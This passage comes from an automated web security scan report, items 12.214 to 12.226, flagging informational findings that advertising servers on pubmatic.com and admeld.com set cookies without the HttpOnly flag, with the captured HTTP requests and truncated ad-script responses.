P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:41 GMT
Content-Length: 1765
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:41 GMT; path=/
Set-Cookie: pubfreq_27331_22455_11514573=973-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:41 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame32733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.214. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A44&ranreq=0.5097279618494213&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:18 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:18 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1564617717=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:18 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:18 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.215. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A35&ranreq=0.5457091238349676&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:09 GMT
Content-Length: 1939
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:09 GMT; path=/
Set-Cookie: pubfreq_27331_23102_732226317=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:09 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:09 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.216. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A7%3A6&ranreq=0.7310515600256622&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:40 GMT
Content-Length: 1221
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:40 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1821068659=136-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:40 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.217. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/728x90/homepage_btf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/221/tmz/728x90/homepage_btf?t=1316238825238&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 876
Content-Type: text/html
Date: Sat, 17 Sep 2011 00:53:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...

12.218. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/unified/300x250/bh_656864_29757782

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 644
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:01:06 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

12.219. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/af-top-right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/af-top-right?t=1316239028884&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&refer=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 634
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:55:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C%21--%0Agoogle_ad_client%20%3D%20%22p
...[SNIP]...

12.220. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right-2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/af-top-right-2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/af-top-right-2?t=1316239030293&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&refer=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 634
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:55:45 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C%21--%0Agoogle_ad_client%20%3D%20%22p
...[SNIP]...

12.221. http://tag.admeld.com/ad/js/221/tmz/300x250/bf-top-right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/bf-top-right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/bf-top-right?t=1316239031965&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&refer=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 715
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:55:46 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3C%21--%20300x250%20%7C%20tmz.com%20BTF%20-%20tmz.com%20BTF%20--%3E%0A%3Cscript%20ty
...[SNIP]...

12.222. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/homepage_atf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/homepage_atf?t=1316238807000&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 613
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:52:02 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C%21--%0Agoogle_ad_client%20%3D%20%22p
...[SNIP]...

12.223. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf_2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/homepage_atf_2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/homepage_atf_2?t=1316238808766&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 448
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:52:04 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%27text%2Fjavascript%27%3E%0Avar%20ACE_AR%20%3D%20%7Bsite%3A%20%27
...[SNIP]...

12.224. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/homepage_btf_rr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/homepage_btf_rr?t=1316238810331&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 715
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:52:07 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3C%21--%20300x250%20%7C%20tmz.com%20BTF%20-%20tmz.com%20BTF%20--%3E%0A%3Cscript%20ty
...[SNIP]...

12.225. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr_2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/homepage_btf_rr_2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/homepage_btf_rr_2?t=1316238817771&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 715
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:52:44 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3C%21--%20300x250%20%7C%20tmz.com%20BTF%20-%20tmz.com%20BTF%20--%3E%0A%3Cscript%20ty
...[SNIP]...

12.226. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_inpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/homepage_inpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/homepage_inpost?t=1316238805237&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 632
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:52:00 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


